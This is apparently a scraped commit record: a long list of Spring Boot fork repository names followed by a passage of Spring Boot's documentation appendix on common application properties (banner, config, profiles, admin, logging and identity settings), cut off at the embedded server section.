qrt\/jenkins2-course-spring-boot,nebhale\/spring-boot,vpavic\/spring-boot,afroje-reshma\/spring-boot-sample,mevasaroj\/jenkins2-course-spring-boot,durai145\/spring-boot,ractive\/spring-boot,cmsandiga\/spring-boot,Chomeh\/spring-boot,lexandro\/spring-boot,prakashme\/spring-boot,vaseemahmed01\/spring-boot,auvik\/spring-boot,nurkiewicz\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,jayarampradhan\/spring-boot,rickeysu\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,felipeg48\/spring-boot,ptahchiev\/spring-boot,RichardCSantana\/spring-boot,prakashme\/spring-boot,sbcoba\/spring-boot,tsachev\/spring-boot,lokbun\/spring-boot,imranansari\/spring-boot,keithsjohnson\/spring-boot,johnktims\/spring-boot,smayoorans\/spring-boot,lif123\/spring-boot,jrrickard\/spring-boot,jrrickard\/spring-boot,kdvolder\/spring-boot,SPNilsen\/spring-boot,jayeshmuralidharan\/spring-boot,jxblum\/spring-boot,kayelau\/spring-boot,jmnarloch\/spring-boot,isopov\/spring-boot,na-na\/spring-boot,RobertNickens\/spring-boot,ydsakyclguozi\/spring-boot,xc145214\/spring-boot,zhangshuangquan\/spring-root,lingounet\/spring-boot,lingounet\/spring-boot,fogone\/spring-boot,navarrogabriela\/spring-boot,Charkui\/spring-boot,allyjunio\/spring-boot,DeezCashews\/spring-boot,htynkn\/spring-boot,lif123\/spring-boot,RainPlanter\/spring-boot,roymanish\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,pnambiarsf\/spring-boot,jack-luj\/spring-boot,tbbost\/spring-boot,marcellodesales\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,npcode\/spring-boot,existmaster\/spring-boot,nurkiewicz\/spring-boot,sungha\/spring-boot,vakninr\/spring-boot,dnsw83\/spring-boot,xdweleven\/spring-boot,frost2014\/spring-boot,ractive\/spring-boot,lcardito\/spring-boot,fireshort\/spring-boot,paweldolecinski\/spring-boot,tsachev\/spring-boot,prasenjit-net\/spring-boot,bbrouwer\/spring-boot,duandf35\/spring-boot,meloncocoo\/spring-boot,jbovet\/spring-boot,Charkui\/spring-boot,jayeshmuralidharan\/spring-boot,tsachev\/spring-boot,jvz\/spring-boot,forestqqqq\/spring-boot,Pokbab\/spring-boot,auvik\/spring-boot,nevenc-pivotal\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,nelswadycki\/spring-boot,donhuvy\/spring-boot,tbbost\/spring-boot,sankin\/spring-boot,hehuabing\/spring-boot,Xaerxess\/spring-boot,clarklj001\/spring-boot,tiarebalbi\/spring-boot,trecloux\/spring-boot,joansmith\/spring-boot,tbadie\/spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,yhj630520\/spring-boot,okba1\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/spring-boot,cbtpro\/spring-boot,AstaTus\/spring-boot,nisuhw\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,mlc0202\/spring-boot,soul2zimate\/spring-boot,playleud\/spring-boot,drumonii\/spring-boot,srikalyan\/spring-boot,RobertNickens\/spring-boot,shangyi0102\/spring-boot,drunklite\/spring-boot,dfa1\/spring-boot,mike-kukla\/spring-boot,hqrt\/jenkins2-course-spring-boot,donhuvy\/spring-boot,shangyi0102\/spring-boot,johnktims\/spring-boot,AstaTus\/spring-boot,htynkn\/spring-boot,roberthafner\/spring-boot,joansmith\/spring-boot,herau\/spring-boot,mebinjacob\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,Makhlab\/spring-boot,pvorb\/spring-boot,sankin\/spring-boot,qq83387856\/spring-boot,thomasdarimont\/spring-boot,krmcbride\/spring-boot,kamilszymanski\/spring-boot,end-user\/spring-boot,jack-luj\/spring-boot,end-user\/spring-boot,akmaharshi\/jenkins,clarklj001\/spring-boot,eric-stanley\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,prakashme\/spring-boot,imranansari\/spring-boot,MasterRoots\/spring-boot,christian-posta\/spring-boot,dnsw83\/spring-boot,felipeg48\/spring-boot,MasterRoots\/spring-boot,mike-kukla\/spring-boot,deki\/spring-boot,Pokbab\/spring-boot,xdweleven\/spring-boot,vaseemahmed01\/spring-boot,buobao\/spring-boot,crackien\/spring-boot,mbogoevici\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,hello2009chen\/spring-boot,zhangshuangquan\/spring-root,paweldolecinski\/spring-boot,mohican0607\/spring-boot,ojacquemart\/spring-boot,mackeprm\/spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,MrMitchellMoore\/spring-boot,VitDevelop\/spring-boot,jbovet\/spring-boot,keithsjohnson\/spring-boot,liupugong\/spring-boot,ameraljovic\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,sungha\/spring-boot,joansmith\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,zhanhb\/spring-boot,huangyugui\/spring-boot,candrews\/spring-boot,patrikbeno\/spring-boot,vaseemahmed01\/spring-boot,VitDevelop\/spring-boot,SPNilsen\/spring-boot,akmaharshi\/jenkins,kdvolder\/spring-boot,roymanish\/spring-boot,rickeysu\/spring-boot,RobertNickens\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,xialeizhou\/spring-boot,Xaerxess\/spring-boot,keithsjohnson\/spring-boot,ApiSecRay\/spring-boot,yhj630520\/spring-boot,mohican0607\/spring-boot,axelfontaine\/spring-boot,cbtpro\/spring-boot,fulvio-m\/spring-boot,existmaster\/spring-boot,felipeg48\/spring-boot,durai145\/spring-boot,PraveenkumarShethe\/spring-boot,joshthornhill\/spring-boot,DeezCashews\/spring-boot,drunklite\/spring-boot,ilayaperumalg\/spring-boot,fogone\/spring-boot,linead\/spring-boot,liupugong\/spring-boot,xdweleven\/spring-boot,mbrukman\/spring-boot,jforge\/spring-boot,dnsw83\/spring-boot,jmnarloch\/spring-boot,mbrukman\/spring-boot,eonezhang\/spring-boot,minmay\/spring-boot,qq83387856\/spring-boot,roberthafner\/spring-boot,sankin\/spring-boot,nelswadycki\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,mouadtk\/spring-boot,duandf35\/spring-boot,sungha\/spring-boot,clarklj001\/spring-boot,MrMitchellMoore\/spring-boot,isopov\/spring-boot,kayelau\/spring-boot,izeye\/spring-boot,fireshort\/spring-boot,qq83387856\/spring-boot,nghialunhaiha\/spring-boot,prakashme\/spring-boot,jeremiahmarks\/spring-boot,orangesdk\/spring-boot,ilayaperumalg\/spring-boot,xwjxwj30abc\/spring-boot,RichardCSantana\/spring-boot,satheeshmb\/spring-boot,Buzzardo\/spring-boot,xingguang2013\/spring-boot,drunklite\/spring-boot,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,olivergierke\/spring-boot,rmoorman\/spring-boot,mbenson\/spring-boot,allyjunio\/spring-boot,mike-kukla\/spring-boot,lingounet\/spring-boot,hklv\/spring-boot,bjornlindstrom\/spring-boot,RishikeshDarandale\/spring-boot,johnktims\/spring-boot,jmnarloch\/spring-boot,sbuettner\/spring-boot,nurkiewicz\/spring-boot,srikalyan\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,linead\/spring-boot,Pokbab\/spring-boot,ChunPIG\/spring-boot,existmaster\/spring-boot,jjankar\/spring-boot,xingguang2013\/spring-boot,jrrickard\/spring-boot,simonnordberg\/spring-boot,htynkn\/spring-boot,habuma\/spring-boot,huangyugui\/spring-boot,MasterRoots\/spring-boot,yuxiaole\/spring-boot,meftaul\/spring-boot,raiamber1\/spring-boot,JiweiWong\/spring-boot,smayoorans\/spring-boot,christian-posta\/spring-boot,zorosteven\/spring-boot,spring-projects\/spring-boot,nghialunhaiha\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,MasterRoots\/spring-boot,javyzheng\/spring-boot,npcode\/spring-boot,brettwooldridge\/spring-boot,panbiping\/spring-boot,bjornlindstrom\/spring-boot,fulvio-m\/spring-boot,duandf35\/spring-boot,donhuvy\/spring-boot,jayarampradhan\/spring-boot,olivergierke\/spring-boot,nevenc-pivotal\/spring-boot,na-na\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,cmsandiga\/spring-boot,chrylis\/spring-boot,damoyang\/spring-boot,eonezhang\/spring-boot,royclarkson\/spring-boot,rams2588\/spring-boot,dreis2211\/spring-boot,balajinsr\/spring-boot,mike-kukla\/spring-boot,nisuhw\/spring-boot,forestqqqq\/spring-boot,izeye\/spring-boot,paweldolecinski\/spring-boot,spring-projects\/spring-boot,rstirling\/spring-boot,NetoDevel\/spring-boot,nisuhw\/spring-boot,mabernardo\/spring-boot,bbrouwer\/spring-boot,shangyi0102\/spring-boot,gauravbrills\/spring-boot,candrews\/spring-boot,mbrukman\/spring-boot,ojacquemart\/spring-boot,rizwan18\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,mebinjacob\/spring-boot,spring-projects\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,cleverjava\/jenkins2-course-spring-boot,murilobr\/spring-boot,okba1\/spring-boot,nghiavo\/spring-boot,sankin\/spring-boot,jforge\/spring-boot,nebhale\/spring-boot,RainPlanter\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,forestqqqq\/spring-boot,mohican0607\/spring-boot,lingounet\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,mbnshankar\/spring-boot,scottfrederick\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hehuabing\/spring-boot,tiarebalbi\/spring-boot,orangesdk\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,cbtpro\/spring-boot,satheeshmb\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,fjlopez\/spring-boot,herau\/spring-boot,neo4j-contrib\/spring-boot,mbnshankar\/spring-boot,PraveenkumarShethe\/spring-boot,designreuse\/spring-boot,Nowheresly\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,ilayaperumalg\/spring-boot,RishikeshDarandale\/spring-boot,5zzang\/spring-boot,end-user\/spring-boot,sbuettner\/spring-boot,mabernardo\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,existmaster\/spring-boot,ameraljovic\/spring-boot,liupugong\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,drumonii\/spring-boot,panbiping\/spring-boot,satheeshmb\/spring-boot,ydsakyclguozi\/spring-boot,hello2009chen\/spring-boot,panbiping\/spring-boot,yuxiaole\/spring-boot,SPNilsen\/spring-boot,MrMitchellMoore\/spring-boot,jjankar\/spring-boot,scottfrederick\/spring-boot,RishikeshDarandale\/spring-boot,kayelau\/spring-boot,johnktims\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,Nowheresly\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,jbovet\/spring-boot,cmsandiga\/spring-boot,marcellodesales\/spring-boot,royclarkson\/spring-boot,xc145214\/spring-boot,ollie314\/spring-boot,eliudiaz\/spring-boot,tbadie\/spring-boot,christian-posta\/spring-boot,yunbian\/spring-boot,dfa1\/spring-boot,mrumpf\/spring-boot,raiamber1\/spring-boot,jrrickard\/spring-boot,xingguang2013\/spring-boot,balajinsr\/spring-boot,playleud\/spring-boot,wwadge\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,smayoorans\/spring-boot,navarrogabriela\/spring-boot,yangdd1205\/spring-boot,M3lkior\/spring-boot,damoyang\/spring-boot,habuma\/spring-boot,rstirling\/spring-boot,herau\/spring-boot,crackien\/spring-boot,krmcbride\/spring-boot,jayeshmuralidharan\/spring-boot,tiarebalbi\/spring-boot,ollie314\/spring-boot,axibase\/spring-boot,jcastaldoFoodEssentials\/spring-boot,gauravbrills\/spring-boot,kdvolder\/spring-boot,rmoorman\/spring-boot,mouadtk\/spring-boot,habuma\/spring-boot,rizwan18\/spring-boot,bclozel\/spring-boot,cmsandiga\/spring-boot,mebinjacob\/spring-boot,ralenmandao\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,xwjxwj30abc\/spring-boot,i007422\/jenkins2-course-spring-boot,murilobr\/spring-boot,hehuabing\/spring-boot,master-slave\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,lif123\/spring-boot,PraveenkumarShethe\/spring-boot,neo4j-contrib\/spring-boot,lexandro\/spring-boot,mebinjacob\/spring-boot,rickeysu\/spring-boot,hqrt\/jenkins2-course-spring-boot,MasterRoots\/spring-boot,master-slave\/spring-boot,bijukunjummen\/spring-boot,ollie314\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,durai145\/spring-boot,smayoorans\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,Makhlab\/spring-boot,mosoft521\/spring-boot,i007422\/jenkins2-course-spring-boot,smilence1986\/spring-boot,bclozel\/spring-boot,designreuse\/spring-boot,lburgazzoli\/spring-boot,lokbun\/spring-boot,srinivasan01\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,xiaoleiPENG\/my-project,meloncocoo\/spring-boot,smilence1986\/spring-boot,Nowheresly\/spring-boot,murilobr\/spring-boot,soul2zimate\/spring-boot,mrumpf\/spring-boot,xwjxwj30abc\/spring-boot,Pokbab\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,crackien\/spring-boot,shakuzen\/spring-boot,liupugong\/spring-boot,xingguang2013\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ApiSecRay\/spring-boot,eric-stanley\/spring-boot,qerub\/spring-boot,RichardCSantana\/spring-boot,frost2014\/spring-boot,M3lkior\/spring-boot,marcellodesales\/spring-boot,mbnshankar\/spring-boot,jxblum\/spring-boot,designreuse\/spring-boot,jack-luj\/spring-boot,frost2014\/spring-boot,soul2zimate\/spring-boot,ojacquemart\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,mabernardo\/spring-boot,clarklj001\/spring-boot,i007422\/jenkins2-course-spring-boot,nurkiewicz\/spring-boot,trecloux\/spring-boot,eliudiaz\/spring-boot,MrMitchellMoore\/spring-boot,ameraljovic\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,drunklite\/spring-boot,orangesdk\/spring-boot,donhuvy\/spring-boot,rizwan18\/spring-boot,jeremiahmarks\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,allyjunio\/spring-boot,ilayaperumalg\/spring-boot,playleud\/spring-boot,tbadie\/spring-boot,lucassaldanha\/spring-boot,ollie314\/spring-boot,philwebb\/spring-boot,okba1\/spring-boot,vakninr\/spring-boot,mosen11\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ojacquemart\/spring-boot,thomasdarimont\/spring-boot,wilkinsona\/spring-boot,lburgazzoli\/spring-boot,mosen11\/spring-boot,duandf35\/spring-boot,eddumelendez\/spring-boot,ChunPIG\/spring-boot,axibase\/spring-boot,buobao\/spring-boot,trecloux\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,sungha\/spring-boot,keithsjohnson\/spring-boot,huangyugui\/spring-boot,roberthafner\/spring-boot,keithsjohnson\/spring-boot,npcode\/spring-boot,philwebb\/spring-boot-concourse,mouadtk\/spring-boot,drumonii\/spring-boot,mbnshankar\/spring-boot,tsachev\/spring-boot,prasenjit-net\/spring-boot,xingguang2013\/spring-boot,AstaTus\/spring-boot,dreis2211\/spring-boot,donthadineshkumar\/spring-boot,lif123\/spring-boot,mabernardo\/spring-boot,xialeizhou\/spring-boot,JiweiWong\/spring-boot,isopov\/spring-boot,simonnordberg\/spring-boot,eliudiaz\/spring-boot,smayoorans\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,RainPlanter\/spring-boot,lucassaldanha\/spring-boot,minmay\/spring-boot,ydsakyclguozi\/spring-boot,tbadie\/spring-boot,ptahchiev\/spring-boot,ydsakyclguozi\/spring-boot,simonnordberg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,damoyang\/spring-boot,eric-stanley\/spring-boot,simonnordberg\/spring-boot,qq83387856\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,gauravbrills\/spring-boot,lokbun\/spring-boot,drunklite\/spring-boot,srikalyan\/spring-boot,hehuabing\/spring-boot,jbovet\/spring-boot,nisuhw\/spring-boot,hklv\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,philwebb\/spring-boot,M3lkior\/spring-boot,peteyan\/spring-boot,wwadge\/spring-boot,AngusZhu\/spring-boot,eonezhang\/spring-boot,sbcoba\/spring-boot,ApiSecRay\/spring-boot,kamilszymanski\/spring-boot,jjankar\/spring-boot,mlc0202\/spring-boot,mackeprm\/spring-boot,hklv\/spring-boot,rizwan18\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,eric-stanley\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,jforge\/spring-boot,soul2zimate\/spring-boot,eonezhang\/spring-boot,lif123\/spring-boot,jcastaldoFoodEssentials\/spring-boot,crackien\/spring-boot,jayarampradhan\/spring-boot,RishikeshDarandale\/spring-boot,isopov\/spring-boot,rams2588\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,mbrukman\/spring-boot,balajinsr\/spring-boot,lcardito\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,rstirling\/spring-boot,RichardCSantana\/spring-boot,ractive\/spring-boot,Chomeh\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,na-na\/spring-boot,ApiSecRay\/spring-boot,marcellodesales\/spring-boot,fjlopez\/spring-boot,ptahchiev\/spring-boot,rmoorman\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,johnktims\/spring-boot,roberthafner\/spring-boot,huangyugui\/spring-boot,pnambiarsf\/spring-boot,zhanhb\/spring-boot,jayarampradhan\/spring-boot,NetoDevel\/spring-boot,navarrogabriela\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,lcardito\/spring-boot,patrikbeno\/spring-boot,fulvio-m\/spring-boot,fjlopez\/spring-boot,rstirling\/spring-boot,joansmith\/spring-boot,zorosteven\/spring-boot,VitDevelop\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,srinivasan01\/spring-boot,navarrogabriela\/spring-boot,nandakishorm\/spring-boot,prasenjit-net\/spring-boot,jeremiahmarks\/spring-boot,smilence1986\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,imranansari\/spring-boot,zhangshuangquan\/spring-root,5zzang\/spring-boot,srinivasan01\/spring-boot,ihoneymon\/spring-boot,nevenc-pivotal\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,jforge\/spring-boot,drumonii\/spring-boot,yunbian\/spring-boot,axelfontaine\/spring-boot,linead\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,nghialunhaiha\/spring-boot,VitDevelop\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dnsw83\/spring-boot,akmaharshi\/jenkins,allyjunio\/spring-boot,Pokbab\/spring-boot,satheeshmb\/spring-boot,bclozel\/spring-boot,eonezhang\/spring-boot,lucassaldanha\/spring-boot,drumonii\/spring-boot,frost2014\/spring-boot,trecloux\/spring-boot,donthadineshkumar\/spring-boot,lucassaldanha\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,lingounet\/spring-boot,mlc0202\/spring-boot,hklv\/spring-boot,nurkiewicz\/spring-boot,eddumelendez\/spring-boot,zorosteven\/spring-boot,sebastiankirsch\/spring-boot,fireshort\/spring-boot,mbogoevici\/spring-boot,donthadineshkumar\/spring-boot,bijukunjummen\/spring-boot,mbrukman\/spring-boot,lcardito\/spring-boot,tiarebalbi\/spring-boot,durai145\/spring-boot,xiaoleiPENG\/my-project,M3lkior\/spring-boot,lenicliu\/spring-boot,mosoft521\/spring-boot,joshthornhill\/spring-boot,jack-luj\/spring-boot,lenicliu\/spring-boot,lokbun\/spring-boot,rmoorman\/spring-boot,bjornlindstrom\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,rstirling\/spring-boot,jcastaldoFoodEssentials\/spring-boot,christian-posta\/spring-boot,rweisleder\/spring-boot,qerub\/spring-boot,soul2zimate\/spring-boot,ilayaperumalg\/spring-boot,herau\/spring-boot,dnsw83\/spring-boot,okba1\/spring-boot,fireshort\/spring-boot,ilayaperumalg\/spring-boot,axibase\/spring-boot,brettwooldridge\/spring-boot,ptahchiev\/spring-boot,paddymahoney\/spring-boot,na-na\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,sbuettner\/spring-boot,habuma\/spring-boot,murilobr\/spring-boot,jcastaldoFoodEssentials\/spring-boot,fulvio-m\/spring-boot,felipeg48\/spring-boot,pvorb\/spring-boot,patrikbeno\/spring-boot,scottfrederick\/spring-boot,AstaTus\/spring-boot,srikalyan\/spring-boot,mackeprm\/spring-boot,pnambiarsf\/spring-boot,ChunPIG\/spring-boot,JiweiWong\/spring-boot,lenicliu\/spring-boot,ChunPIG\/spring-boot,xc145214\/spring-boot,rams2588\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,DONIKAN\/spring-boot,deki\/spring-boot,afroje-reshma\/spring-boot-sample,nandakishorm\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,brettwooldridge\/spring-boot,roymanish\/spring-boot,shakuzen\/spring-boot,navarrogabriela\/spring-boot,duandf35\/spring-boot,RobertNickens\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,RainPlanter\/spring-boot,mebinjacob\/spring-boot,vpavic\/spring-boot,philwebb\/spring-boot-concourse,mohican0607\/spring-boot,auvik\/spring-boot,imranansari\/spring-boot,sebastiankirsch\/spring-boot,fogone\/spring-boot,michael-simons\/spring-boot,kiranbpatil\/spring-boot,DONIKAN\/spring-boot,izeye\/spring-boot,jcastaldoFoodEssentials\/spring-boot,tsachev\/spring-boot,hklv\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,sungha\/spring-boot,zhangshuangquan\/spring-root,javyzheng\/spring-boot,akmaharshi\/jenkins,mouadtk\/spring-boot,MrMitchellMoore\/spring-boot,mbenson\/spring-boot,mackeprm\/spring-boot,gauravbrills\/spring-boot,frost2014\/spring-boot,Chomeh\/spring-boot,vakninr\/spring-boot,philwebb\/spring-boot-concourse,srikalyan\/spring-boot,michael-simons\/spring-boot,nelswadycki\/spring-boot,mdeinum\/spring-boot,DONIKAN\/spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,mlc0202\/spring-boot,roberthafner\/spring-boot,marcellodesales\/spring-boot,yuxiaole\/spring-boot,christian-posta\/spring-boot,xialeizhou\/spring-boot,bjornlindstrom\/spring-boot,ralenmandao\/spring-boot,mbogoevici\/spring-boot,existmaster\/spring-boot,playleud\/spring-boot,forestqqqq\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,DONIKAN\/spring-boot,smilence1986\/spring-boot,felipeg48\/spring-boot,paddymahoney\/spring-boot,raiamber1\/spring-boot,afroje-reshma\/spring-boot-sample,mrumpf\/spring-boot,Chomeh\/spring-boot,AngusZhu\/spring-boot,jeremiahmarks\/spring-boot,eric-stanley\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,bclozel\/spring-boot,designreuse\/spring-boot,xialeizhou\/spring-boot,bjornlindstrom\/spring-boot,npcode\/spring-boot,forestqqqq\/spring-boot,xc145214\/spring-boot,javyzheng\/spring-boot,AngusZhu\/spring-boot,jforge\/spring-boot,jjankar\/spring-boot,zhanhb\/spring-boot,tbadie\/spring-boot,mike-kukla\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,lenicliu\/spring-boot,RainPlanter\/spring-boot,yunbian\/spring-boot,zorosteven\/spring-boot,rickeysu\/spring-boot,jayarampradhan\/spring-boot,jayeshmuralidharan\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,auvik\/spring-boot,vpavic\/spring-boot,jack-luj\/spring-boot,mrumpf\/spring-boot,kayelau\/spring-boot,meftaul\/spring-boot,xiaoleiPENG\/my-project,linead\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,buobao\/spring-boot,auvik\/spring-boot,meftaul\/spring-boot,lenicliu\/spring-boot,meloncocoo\/spring-boot,axelfontaine\/spring-boot,nevenc-pivotal\/spring-boot,ChunPIG\/spring-boot,Charkui\/spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ydsakyclguozi\/spring-boot,philwebb\/spring-boot-concourse,rams2588\/spring-boot,rweisleder\/spring-boot,na-na\/spring-boot,DONIKAN\/spring-boot,mbnshankar\/spring-boot,mosen11\/spring-boot,shakuzen\/spring-boot,krmcbride\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,mosen11\/spring-boot,xdweleven\/spring-boot,JiweiWong\/spring-boot,cbtpro\/spring-boot,sebastiankirsch\/spring-boot,meloncocoo\/spring-boot,tbbost\/spring-boot,pnambiarsf\/spring-boot,jvz\/spring-boot,meftaul\/spring-boot,lucassaldanha\/spring-boot,peteyan\/spring-boot,mbenson\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,JiweiWong\/spring-boot,roymanish\/spring-boot,xiaoleiPENG\/my-project,joshiste\/spring-boot,cmsandiga\/spring-boot,imranansari\/spring-boot,master-slave\/spring-boot,mabernardo\/spring-boot,Charkui\/spring-boot,krmcbride\/spring-boot,rmoorman\/spring-boot,mohican0607\/spring-boot,habuma\/spring-boot,paddymahoney\/spring-boot,paweldolecinski\/spring-boot,prakashme\/spring-boot,ihoneymon\/spring-boot,Makhlab\/spring-boot,rams2588\/spring-boot,bclozel\/spring-boot,vaseemahmed01\/spring-boot,Nowheresly\/spring-boot,izeye\/spring-boot,fogone\/spring-boot,nandakishorm\/spring-boot,tbbost\/spring-boot,mackeprm\/spring-boot,hehuabing\/spring-boot,michael-simons\/spring-boot,PraveenkumarShethe\/spring-boot,Makhlab\/spring-boot,yunbian\/spring-boot,end-user\/spring-boot,Makhlab\/spring-boot,nandakishorm\/spring-boot,nevenc-pivotal\/spring-boot,trecloux\/spring-boot,eddumelendez\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,buobao\/spring-boot,jjankar\/spring-boot,fogone\/spring-boot,eliudiaz\/spring-boot,wwadge\/spring-boot,jrrickard\/spring-boot,fireshort\/spring-boot,jxblum\/spring-boot,SPNilsen\/spring-boot,mdeinum\/spring-boot,RishikeshDarandale\/spring-boot,smilence1986\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION 